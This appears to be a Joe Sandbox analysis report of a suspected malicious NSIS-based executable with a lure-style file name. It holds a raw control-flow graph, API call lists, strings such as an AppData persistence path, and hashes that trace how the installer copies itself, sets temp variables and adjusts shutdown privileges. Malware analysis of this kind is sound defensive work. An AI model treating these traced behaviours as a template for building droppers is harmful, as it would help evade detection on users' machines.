SetErrorMode GetVersionExA 4682 40342a GetVersionExA 4681->4682 4684 403469 4681->4684 4683 403446 4682->4683 4682->4684 4683->4684 4685 4034ed 4684->4685 4686 4066b5 5 API calls 4684->4686 4687 406647 3 API calls 4685->4687 4686->4685 4688 403503 lstrlenA 4687->4688 4688->4685 4689 403513 4688->4689 4690 4066b5 5 API calls 4689->4690 4691 40351a 4690->4691 4692 4066b5 5 API calls 4691->4692 4693 403521 4692->4693 4694 4066b5 5 API calls 4693->4694 4695 40352d #17 OleInitialize SHGetFileInfoA 4694->4695 4770 40628d lstrcpynA 4695->4770 4698 40357b GetCommandLineA 4771 40628d lstrcpynA 4698->4771 4700 40358d 4701 405c4a CharNextA 4700->4701 4702 4035b4 CharNextA 4701->4702 4707 4035c3 4702->4707 4703 403689 4704 40369d GetTempPathA 4703->4704 4772 4033a7 4704->4772 4706 4036b5 4708 4036b9 GetWindowsDirectoryA lstrcatA 4706->4708 4709 40370f DeleteFileA 4706->4709 4707->4703 4710 405c4a CharNextA 4707->4710 4715 40368b 4707->4715 4711 4033a7 12 API calls 4708->4711 4782 402f31 GetTickCount GetModuleFileNameA 4709->4782 4710->4707 4714 4036d5 4711->4714 4713 403722 4718 4037a7 4713->4718 4722 405c4a CharNextA 4713->4722 4761 4037b7 4713->4761 4714->4709 4717 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4714->4717 4866 40628d lstrcpynA 4715->4866 4720 4033a7 12 API calls 4717->4720 4810 403a96 4718->4810 4724 403707 4720->4724 4725 40373c 4722->4725 4724->4709 4724->4761 4734 403781 4725->4734 4735 4037e6 4725->4735 4726 4037d1 4876 4059a3 4726->4876 4727 403928 4728 403930 GetCurrentProcess OpenProcessToken 4727->4728 4729 4039a6 ExitProcess 4727->4729 4732 403976 4728->4732 4733 403947 LookupPrivilegeValueA AdjustTokenPrivileges 4728->4733 4737 4066b5 5 API calls 4732->4737 4733->4732 4738 405d0d 18 API calls 4734->4738 4739 40590e 5 API calls 4735->4739 4740 40397d 4737->4740 4741 40378d 4738->4741 4742 4037eb lstrlenA 4739->4742 4743 403992 ExitWindowsEx 4740->4743 4745 40399f 4740->4745 4741->4761 4867 40628d lstrcpynA 4741->4867 
4880 40628d lstrcpynA 4742->4880 4743->4729 4743->4745 4748 40140b 2 API calls 4745->4748 4747 403803 4754 40381b 4747->4754 4881 40628d lstrcpynA 4747->4881 4748->4729 4749 40379c 4868 40628d lstrcpynA 4749->4868 4752 403839 wsprintfA 4753 406320 21 API calls 4752->4753 4753->4754 4754->4752 4767 403867 4754->4767 4755 405897 2 API calls 4755->4767 4756 4058f1 2 API calls 4756->4767 4757 403877 GetFileAttributesA 4760 403883 DeleteFileA 4757->4760 4757->4767 4758 4038af SetCurrentDirectoryA 4759 406066 40 API calls 4758->4759 4762 4038be CopyFileA 4759->4762 4760->4767 4869 4039bc 4761->4869 4762->4761 4762->4767 4763 405a4f 71 API calls 4763->4767 4764 406066 40 API calls 4764->4767 4765 406320 21 API calls 4765->4767 4766 405926 2 API calls 4766->4767 4767->4752 4767->4754 4767->4755 4767->4756 4767->4757 4767->4758 4767->4761 4767->4763 4767->4764 4767->4765 4767->4766 4768 403918 CloseHandle 4767->4768 4769 406620 2 API calls 4767->4769 4768->4761 4769->4767 4770->4698 4771->4700 4773 406587 5 API calls 4772->4773 4774 4033b3 4773->4774 4775 4033bd 4774->4775 4776 405c1f 3 API calls 4774->4776 4775->4706 4777 4033c5 4776->4777 4778 4058f1 2 API calls 4777->4778 4779 4033cb 4778->4779 4780 405e4f 2 API calls 4779->4780 4781 4033d6 4780->4781 4781->4706 4882 405e20 GetFileAttributesA CreateFileA 4782->4882 4784 402f71 4803 402f81 4784->4803 4883 40628d lstrcpynA 4784->4883 4786 402f97 4787 405c66 2 API calls 4786->4787 4788 402f9d 4787->4788 4884 40628d lstrcpynA 4788->4884 4790 402fa8 GetFileSize 4791 4030a2 4790->4791 4805 402fbf 4790->4805 4885 402ecd 4791->4885 4793 4030ab 4795 4030db GlobalAlloc 4793->4795 4793->4803 4897 403390 SetFilePointer 4793->4897 4794 40337a ReadFile 4794->4805 4896 403390 SetFilePointer 4795->4896 4798 40310e 4800 402ecd 6 API calls 4798->4800 4799 4030f6 4802 403168 35 API calls 4799->4802 4800->4803 4801 4030c4 4804 40337a ReadFile 4801->4804 4808 403102 4802->4808 4803->4713 4806 4030cf 4804->4806 4805->4791 4805->4794 
4805->4798 4805->4803 4807 402ecd 6 API calls 4805->4807 4806->4795 4806->4803 4807->4805 4808->4803 4808->4808 4809 40313f SetFilePointer 4808->4809 4809->4803 4811 4066b5 5 API calls 4810->4811 4812 403aaa 4811->4812 4813 403ab0 4812->4813 4814 403ac2 4812->4814 4906 4061eb wsprintfA 4813->4906 4815 406174 3 API calls 4814->4815 4816 403aed 4815->4816 4818 403b0b lstrcatA 4816->4818 4820 406174 3 API calls 4816->4820 4819 403ac0 4818->4819 4898 403d5b 4819->4898 4820->4818 4823 405d0d 18 API calls 4824 403b3d 4823->4824 4825 403bc6 4824->4825 4827 406174 3 API calls 4824->4827 4826 405d0d 18 API calls 4825->4826 4828 403bcc 4826->4828 4829 403b69 4827->4829 4830 403bdc LoadImageA 4828->4830 4831 406320 21 API calls 4828->4831 4829->4825 4835 403b85 lstrlenA 4829->4835 4838 405c4a CharNextA 4829->4838 4832 403c82 4830->4832 4833 403c03 RegisterClassA 4830->4833 4831->4830 4834 40140b 2 API calls 4832->4834 4836 403c39 SystemParametersInfoA CreateWindowExA 4833->4836 4865 403c8c 4833->4865 4837 403c88 4834->4837 4839 403b93 lstrcmpiA 4835->4839 4840 403bb9 4835->4840 4836->4832 4845 403d5b 22 API calls 4837->4845 4837->4865 4842 403b83 4838->4842 4839->4840 4843 403ba3 GetFileAttributesA 4839->4843 4841 405c1f 3 API calls 4840->4841 4846 403bbf 4841->4846 4842->4835 4844 403baf 4843->4844 4844->4840 4847 405c66 2 API calls 4844->4847 4848 403c99 4845->4848 4907 40628d lstrcpynA 4846->4907 4847->4840 4850 403ca5 ShowWindow 4848->4850 4851 403d28 4848->4851 4853 406647 3 API calls 4850->4853 4852 4054a3 5 API calls 4851->4852 4854 403d2e 4852->4854 4855 403cbd 4853->4855 4856 403d32 4854->4856 4857 403d4a 4854->4857 4858 403ccb GetClassInfoA 4855->4858 4860 406647 3 API calls 4855->4860 4863 40140b 2 API calls 4856->4863 4856->4865 4859 40140b 2 API calls 4857->4859 4861 403cf5 DialogBoxParamA 4858->4861 4862 403cdf GetClassInfoA RegisterClassA 4858->4862 4859->4865 4860->4858 4864 40140b 2 API calls 4861->4864 4862->4861 4863->4865 4864->4865 4865->4761 4866->4704 
4867->4749 4868->4718 4870 4039d4 4869->4870 4871 4039c6 CloseHandle 4869->4871 4909 403a01 4870->4909 4871->4870 4874 405a4f 71 API calls 4875 4037bf OleUninitialize 4874->4875 4875->4726 4875->4727 4877 4059b8 4876->4877 4878 4037de ExitProcess 4877->4878 4879 4059cc MessageBoxIndirectA 4877->4879 4879->4878 4880->4747 4881->4754 4882->4784 4883->4786 4884->4790 4886 402ed6 4885->4886 4887 402eee 4885->4887 4888 402ee6 4886->4888 4889 402edf DestroyWindow 4886->4889 4890 402ef6 4887->4890 4891 402efe GetTickCount 4887->4891 4888->4793 4889->4888 4892 4066f1 2 API calls 4890->4892 4893 402f0c CreateDialogParamA ShowWindow 4891->4893 4894 402f2f 4891->4894 4895 402efc 4892->4895 4893->4894 4894->4793 4895->4793 4896->4799 4897->4801 4899 403d6f 4898->4899 4908 4061eb wsprintfA 4899->4908 4901 403de0 4902 403e14 22 API calls 4901->4902 4903 403de5 4902->4903 4904 403b1b 4903->4904 4905 406320 21 API calls 4903->4905 4904->4823 4905->4903 4906->4819 4907->4825 4908->4901 4910 403a0f 4909->4910 4911 4039d9 4910->4911 4912 403a14 FreeLibrary GlobalFree 4910->4912 4911->4874 4912->4911 4912->4912 4913 402758 4914 40275f 4913->4914 4915 402a6c 4913->4915 4916 402c3c 21 API calls 4914->4916 4917 402766 4916->4917 4918 402775 SetFilePointer 4917->4918 4918->4915 4919 402785 4918->4919 4921 4061eb wsprintfA 4919->4921 4921->4915 5064 401e5a GetDC 5065 402c3c 21 API calls 5064->5065 5066 401e6c GetDeviceCaps MulDiv ReleaseDC 5065->5066 5067 402c3c 21 API calls 5066->5067 5068 401e9d 5067->5068 5069 406320 21 API calls 5068->5069 5070 401eda CreateFontIndirectA 5069->5070 5071 40264d 5070->5071 3904 4015e0 3923 402c5e 3904->3923 3908 401649 3910 401677 3908->3910 3911 40164e 3908->3911 3914 401423 28 API calls 3910->3914 3945 401423 3911->3945 3920 40166f 3914->3920 3918 401660 SetCurrentDirectoryA 3918->3920 3919 4015ef 3919->3908 3921 401631 GetFileAttributesA 3919->3921 3935 405c4a 3919->3935 3939 40590e 3919->3939 3942 405897 CreateDirectoryA 3919->3942 3949 4058f1 
CreateDirectoryA 3919->3949 3921->3919 3924 402c6a 3923->3924 3952 406320 3924->3952 3927 4015e7 3929 405cb8 CharNextA CharNextA 3927->3929 3930 405cd3 3929->3930 3933 405ce3 3929->3933 3931 405cde CharNextA 3930->3931 3930->3933 3934 405d03 3931->3934 3932 405c4a CharNextA 3932->3933 3933->3932 3933->3934 3934->3919 3936 405c50 3935->3936 3937 405c63 3936->3937 3938 405c56 CharNextA 3936->3938 3937->3919 3938->3936 3940 4066b5 5 API calls 3939->3940 3941 405915 3940->3941 3941->3919 3943 4058e3 3942->3943 3944 4058e7 GetLastError 3942->3944 3943->3919 3944->3943 3999 4053d1 3945->3999 3948 40628d lstrcpynA 3948->3918 3950 405901 3949->3950 3951 405905 GetLastError 3949->3951 3950->3919 3951->3950 3965 40632d 3952->3965 3953 40656e 3954 402c8b 3953->3954 3991 40628d lstrcpynA 3953->3991 3954->3927 3969 406587 3954->3969 3956 406545 lstrlenA 3956->3965 3959 406320 15 API calls 3959->3956 3961 40644c GetSystemDirectoryA 3961->3965 3962 406462 GetWindowsDirectoryA 3962->3965 3963 406587 5 API calls 3963->3965 3964 4064ee lstrcatA 3964->3965 3965->3953 3965->3956 3965->3959 3965->3961 3965->3962 3965->3963 3965->3964 3966 406320 15 API calls 3965->3966 3968 4064c5 SHGetPathFromIDListA CoTaskMemFree 3965->3968 3978 406174 3965->3978 3983 4066b5 GetModuleHandleA 3965->3983 3989 4061eb wsprintfA 3965->3989 3990 40628d lstrcpynA 3965->3990 3966->3965 3968->3965 3976 406593 3969->3976 3970 4065fb 3971 4065ff CharPrevA 3970->3971 3973 40661a 3970->3973 3971->3970 3972 4065f0 CharNextA 3972->3970 3972->3976 3973->3927 3974 405c4a CharNextA 3974->3976 3975 4065de CharNextA 3975->3976 3976->3970 3976->3972 3976->3974 3976->3975 3977 4065eb CharNextA 3976->3977 3977->3972 3992 406113 3978->3992 3981 4061a8 RegQueryValueExA RegCloseKey 3982 4061d7 3981->3982 3982->3965 3984 4066d1 3983->3984 3985 4066db GetProcAddress 3983->3985 3996 406647 GetSystemDirectoryA 3984->3996 3987 4066ea 3985->3987 3987->3965 3988 4066d7 3988->3985 3988->3987 3989->3965 3990->3965 3991->3954 3993 
406122 3992->3993 3994 406126 3993->3994 3995 40612b RegOpenKeyExA 3993->3995 3994->3981 3994->3982 3995->3994 3997 406669 wsprintfA LoadLibraryExA 3996->3997 3997->3988 4000 401431 3999->4000 4001 4053ec 3999->4001 4000->3948 4002 405409 lstrlenA 4001->4002 4003 406320 21 API calls 4001->4003 4004 405432 4002->4004 4005 405417 lstrlenA 4002->4005 4003->4002 4007 405445 4004->4007 4008 405438 SetWindowTextA 4004->4008 4005->4000 4006 405429 lstrcatA 4005->4006 4006->4004 4007->4000 4009 40544b SendMessageA SendMessageA SendMessageA 4007->4009 4008->4007 4009->4000 5072 4016e0 5073 402c5e 21 API calls 5072->5073 5074 4016e6 GetFullPathNameA 5073->5074 5075 4016fd 5074->5075 5081 40171e 5074->5081 5078 406620 2 API calls 5075->5078 5075->5081 5076 401732 GetShortPathNameA 5077 402aea 5076->5077 5079 40170e 5078->5079 5079->5081 5082 40628d lstrcpynA 5079->5082 5081->5076 5081->5077 5082->5081 5083 404463 lstrcpynA lstrlenA 4309 401eea 4310 402c3c 21 API calls 4309->4310 4311 401ef0 4310->4311 4312 402c3c 21 API calls 4311->4312 4313 401efc 4312->4313 4314 401f13 EnableWindow 4313->4314 4315 401f08 ShowWindow 4313->4315 4316 402aea 4314->4316 4315->4316 4317 40176b 4318 402c5e 21 API calls 4317->4318 4319 401772 4318->4319 4323 405e4f 4319->4323 4321 401779 4322 405e4f 2 API calls 4321->4322 4322->4321 4324 405e5a GetTickCount GetTempFileNameA 4323->4324 4325 405e8b 4324->4325 4326 405e87 4324->4326 4325->4321 4326->4324 4326->4325 5084 40196c 5085 402c5e 21 API calls 5084->5085 5086 401973 lstrlenA 5085->5086 5087 40264d 5086->5087 5088 401ff0 5089 402c5e 21 API calls 5088->5089 5090 401ff7 5089->5090 5091 406620 2 API calls 5090->5091 5092 401ffd 5091->5092 5094 40200f 5092->5094 5095 4061eb wsprintfA 5092->5095 5095->5094 5096 6e331000 5097 6e33101b 5 API calls 5096->5097 5098 6e331019 5097->5098 5099 4014f4 SetForegroundWindow 5100 402aea 5099->5100 5101 404778 5102 404788 5101->5102 5103 4047ae 5101->5103 5104 40432d 22 API calls 5102->5104 5105 404394 8 API 
calls 5103->5105 5106 404795 SetDlgItemTextA 5104->5106 5107 4047ba 5105->5107 5106->5103 4932 40177e 4933 402c5e 21 API calls 4932->4933 4934 401785 4933->4934 4935 4017a3 4934->4935 4936 4017ab 4934->4936 4971 40628d lstrcpynA 4935->4971 4972 40628d lstrcpynA 4936->4972 4939 4017a9 4943 406587 5 API calls 4939->4943 4940 4017b6 4941 405c1f 3 API calls 4940->4941 4942 4017bc lstrcatA 4941->4942 4942->4939 4954 4017c8 4943->4954 4944 406620 2 API calls 4944->4954 4945 405dfb 2 API calls 4945->4954 4947 4017df CompareFileTime 4947->4954 4948 4018a3 4949 4053d1 28 API calls 4948->4949 4950 4018ad 4949->4950 4953 403168 35 API calls 4950->4953 4951 4053d1 28 API calls 4967 40188f 4951->4967 4952 40628d lstrcpynA 4952->4954 4955 4018c0 4953->4955 4954->4944 4954->4945 4954->4947 4954->4948 4954->4952 4957 406320 21 API calls 4954->4957 4964 4059a3 MessageBoxIndirectA 4954->4964 4969 40187a 4954->4969 4970 405e20 GetFileAttributesA CreateFileA 4954->4970 4956 4018d4 SetFileTime 4955->4956 4958 4018e6 CloseHandle 4955->4958 4956->4958 4957->4954 4959 4018f7 4958->4959 4958->4967 4960 4018fc 4959->4960 4961 40190f 4959->4961 4962 406320 21 API calls 4960->4962 4963 406320 21 API calls 4961->4963 4965 401904 lstrcatA 4962->4965 4966 401917 4963->4966 4964->4954 4965->4966 4966->4967 4968 4059a3 MessageBoxIndirectA 4966->4968 4968->4967 4969->4951 4969->4967 4970->4954 4971->4939 4972->4940 5108 40167e 5109 402c5e 21 API calls 5108->5109 5110 401684 5109->5110 5111 406620 2 API calls 5110->5111 5112 40168a 5111->5112 5113 40197e 5114 402c3c 21 API calls 5113->5114 5115 401985 5114->5115 5116 402c3c 21 API calls 5115->5116 5117 401992 5116->5117 5118 402c5e 21 API calls 5117->5118 5119 4019a9 lstrlenA 5118->5119 5120 4019b9 5119->5120 5121 4019f9 5120->5121 5125 40628d lstrcpynA 5120->5125 5123 4019e9 5123->5121 5124 4019ee lstrlenA 5123->5124 5124->5121 5125->5123 5126 401000 5127 401037 BeginPaint GetClientRect 5126->5127 5128 40100c DefWindowProcA 5126->5128 5130 4010f3 
5127->5130 5131 401179 5128->5131 5132 401073 CreateBrushIndirect FillRect DeleteObject 5130->5132 5133 4010fc 5130->5133 5132->5130 5134 401102 CreateFontIndirectA 5133->5134 5135 401167 EndPaint 5133->5135 5134->5135 5136 401112 6 API calls 5134->5136 5135->5131 5136->5135 5137 6e332c73 5138 6e332c8b 5137->5138 5139 6e3315c4 2 API calls 5138->5139 5140 6e332ca6 5139->5140 5141 401502 5142 401507 5141->5142 5144 40152d 5141->5144 5143 402c3c 21 API calls 5142->5143 5143->5144 5145 401a83 5146 402c3c 21 API calls 5145->5146 5147 401a8c 5146->5147 5148 402c3c 21 API calls 5147->5148 5149 401a33 5148->5149 5150 401588 5151 402a67 5150->5151 5154 4061eb wsprintfA 5151->5154 5153 402a6c 5154->5153 5155 401b88 5156 402c5e 21 API calls 5155->5156 5157 401b8f 5156->5157 5158 402c3c 21 API calls 5157->5158 5159 401b98 wsprintfA 5158->5159 5160 402aea 5159->5160 5161 401d8a 5162 401d90 5161->5162 5163 401d9d GetDlgItem 5161->5163 5164 402c3c 21 API calls 5162->5164 5165 401d97 5163->5165 5164->5165 5166 401dde GetClientRect LoadImageA SendMessageA 5165->5166 5167 402c5e 21 API calls 5165->5167 5169 401e3f 5166->5169 5171 401e4b 5166->5171 5167->5166 5170 401e44 DeleteObject 5169->5170 5169->5171 5170->5171 5172 40278b 5173 402791 5172->5173 5174 402799 FindClose 5173->5174 5175 402aea 5173->5175 5174->5175 5176 40240d 5177 402c5e 21 API calls 5176->5177 5178 40241e 5177->5178 5179 402c5e 21 API calls 5178->5179 5180 402427 5179->5180 5181 402c5e 21 API calls 5180->5181 5182 402431 GetPrivateProfileStringA 5181->5182 5183 40280d 5184 402c5e 21 API calls 5183->5184 5185 402819 5184->5185 5186 40282f 5185->5186 5188 402c5e 21 API calls 5185->5188 5187 405dfb 2 API calls 5186->5187 5189 402835 5187->5189 5188->5186 5211 405e20 GetFileAttributesA CreateFileA 5189->5211 5191 402842 5192 4028fe 5191->5192 5193 4028e6 5191->5193 5194 40285d GlobalAlloc 5191->5194 5195 402905 DeleteFileA 5192->5195 5196 402918 5192->5196 5198 403168 35 API calls 5193->5198 5194->5193 5197 402876 
5194->5197 5195->5196 5212 403390 SetFilePointer 5197->5212 5200 4028f3 CloseHandle 5198->5200 5200->5192 5201 40287c 5202 40337a ReadFile 5201->5202 5203 402885 GlobalAlloc 5202->5203 5204 402895 5203->5204 5205 4028cf 5203->5205 5207 403168 35 API calls 5204->5207 5206 405ec7 WriteFile 5205->5206 5208 4028db GlobalFree 5206->5208 5210 4028a2 5207->5210 5208->5193 5209 4028c6 GlobalFree 5209->5205 5210->5209 5211->5191 5212->5201 4356 40550f 4357 405531 GetDlgItem GetDlgItem GetDlgItem 4356->4357 4358 4056ba 4356->4358 4402 404362 SendMessageA 4357->4402 4359 4056c2 GetDlgItem CreateThread CloseHandle 4358->4359 4360 4056ea 4358->4360 4359->4360 4425 4054a3 OleInitialize 4359->4425 4362 405718 4360->4362 4364 405700 ShowWindow ShowWindow 4360->4364 4365 405739 4360->4365 4366 405720 4362->4366 4367 405773 4362->4367 4363 4055a1 4368 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4363->4368 4407 404362 SendMessageA 4364->4407 4411 404394 4365->4411 4370 405728 4366->4370 4371 40574c ShowWindow 4366->4371 4367->4365 4375 405780 SendMessageA 4367->4375 4373 405616 4368->4373 4374 4055fa SendMessageA SendMessageA 4368->4374 4408 404306 4370->4408 4378 40576c 4371->4378 4379 40575e 4371->4379 4381 405629 4373->4381 4382 40561b SendMessageA 4373->4382 4374->4373 4377 405745 4375->4377 4383 405799 CreatePopupMenu 4375->4383 4380 404306 SendMessageA 4378->4380 4384 4053d1 28 API calls 4379->4384 4380->4367 4403 40432d 4381->4403 4382->4381 4385 406320 21 API calls 4383->4385 4384->4378 4387 4057a9 AppendMenuA 4385->4387 4389 4057c7 GetWindowRect 4387->4389 4390 4057da TrackPopupMenu 4387->4390 4388 405639 4391 405642 ShowWindow 4388->4391 4392 405676 GetDlgItem SendMessageA 4388->4392 4389->4390 4390->4377 4393 4057f6 4390->4393 4394 405665 4391->4394 4395 405658 ShowWindow 4391->4395 4392->4377 4396 40569d SendMessageA SendMessageA 4392->4396 4397 405815 SendMessageA 4393->4397 4406 404362 SendMessageA 4394->4406 4395->4394 4396->4377 4397->4397 4398 
405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4397->4398 4400 405854 SendMessageA 4398->4400 4400->4400 4401 405876 GlobalUnlock SetClipboardData CloseClipboard 4400->4401 4401->4377 4402->4363 4404 406320 21 API calls 4403->4404 4405 404338 SetDlgItemTextA 4404->4405 4405->4388 4406->4392 4407->4362 4409 404313 SendMessageA 4408->4409 4410 40430d 4408->4410 4409->4365 4410->4409 4412 404457 4411->4412 4413 4043ac GetWindowLongA 4411->4413 4412->4377 4413->4412 4414 4043c1 4413->4414 4414->4412 4415 4043f1 4414->4415 4416 4043ee GetSysColor 4414->4416 4417 404401 SetBkMode 4415->4417 4418 4043f7 SetTextColor 4415->4418 4416->4415 4419 404419 GetSysColor 4417->4419 4420 40441f 4417->4420 4418->4417 4419->4420 4421 404430 4420->4421 4422 404426 SetBkColor 4420->4422 4421->4412 4423 404443 DeleteObject 4421->4423 4424 40444a CreateBrushIndirect 4421->4424 4422->4421 4423->4424 4424->4412 4432 404379 4425->4432 4427 404379 SendMessageA 4429 4054ff OleUninitialize 4427->4429 4428 4054c6 4431 4054ed 4428->4431 4435 401389 4428->4435 4431->4427 4433 404391 4432->4433 4434 404382 SendMessageA 4432->4434 4433->4428 4434->4433 4437 401390 4435->4437 4436 4013fe 4436->4428 4437->4436 4438 4013cb MulDiv SendMessageA 4437->4438 4438->4437 5213 40168f 5214 402c5e 21 API calls 5213->5214 5215 401696 5214->5215 5216 402c5e 21 API calls 5215->5216 5217 40169f 5216->5217 5218 402c5e 21 API calls 5217->5218 5219 4016a8 MoveFileA 5218->5219 5220 4016b4 5219->5220 5221 4016bb 5219->5221 5223 401423 28 API calls 5220->5223 5222 406620 2 API calls 5221->5222 5225 40230f 5221->5225 5224 4016ca 5222->5224 5223->5225 5224->5225 5226 406066 40 API calls 5224->5226 5226->5220 5227 401490 5228 4053d1 28 API calls 5227->5228 5229 401497 5228->5229 5230 404b10 5231 404b20 5230->5231 5232 404b3c 5230->5232 5241 405987 GetDlgItemTextA 5231->5241 5234 404b42 SHGetPathFromIDListA 5232->5234 5235 404b6f 5232->5235 5237 404b59 SendMessageA 5234->5237 5238 404b52 5234->5238 5236 404b2d 

                                        Control-flow Graph

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                                        • GetVersionExA.KERNEL32(?), ref: 00403424
                                        • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                        • OleInitialize.OLE32(00000000), ref: 00403548
                                        • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                        • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",00000020,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                                        • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                        • ExitProcess.KERNEL32 ref: 004037E0
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                        • wsprintfA.USER32 ref: 00403846
                                        • GetFileAttributesA.KERNEL32(888,C:\Users\user\AppData\Local\Temp\,888,?,0000000C), ref: 00403878
                                        • DeleteFileA.KERNEL32(888), ref: 00403884
                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,888,?,0000000C), ref: 004038B0
                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,888,00000001), ref: 004038C6
                                        • CloseHandle.KERNEL32(00000000,00431800,00431800,?,888,00000000), ref: 00403919
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                        • ExitProcess.KERNEL32 ref: 004039B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                        • String ID: "$"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$1033$888$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$C:\Users\user\Desktop$C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu%X.tmp
                                        • API String ID: 2956269667-4036010298
                                        • Opcode ID: 5cdaee19dc3e25094bd540d3cee5e8eae226bbf285dc81e201763af22fa04eb7
                                        • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                        • Opcode Fuzzy Hash: 5cdaee19dc3e25094bd540d3cee5e8eae226bbf285dc81e201763af22fa04eb7
                                        • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

                                        Control-flow Graph

                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                        • GetClientRect.USER32(?,?), ref: 004055BA
                                        • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                        • ShowWindow.USER32(?,00000008), ref: 0040565D
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                        • CloseHandle.KERNELBASE(00000000), ref: 004056E4
                                        • ShowWindow.USER32(00000000), ref: 00405707
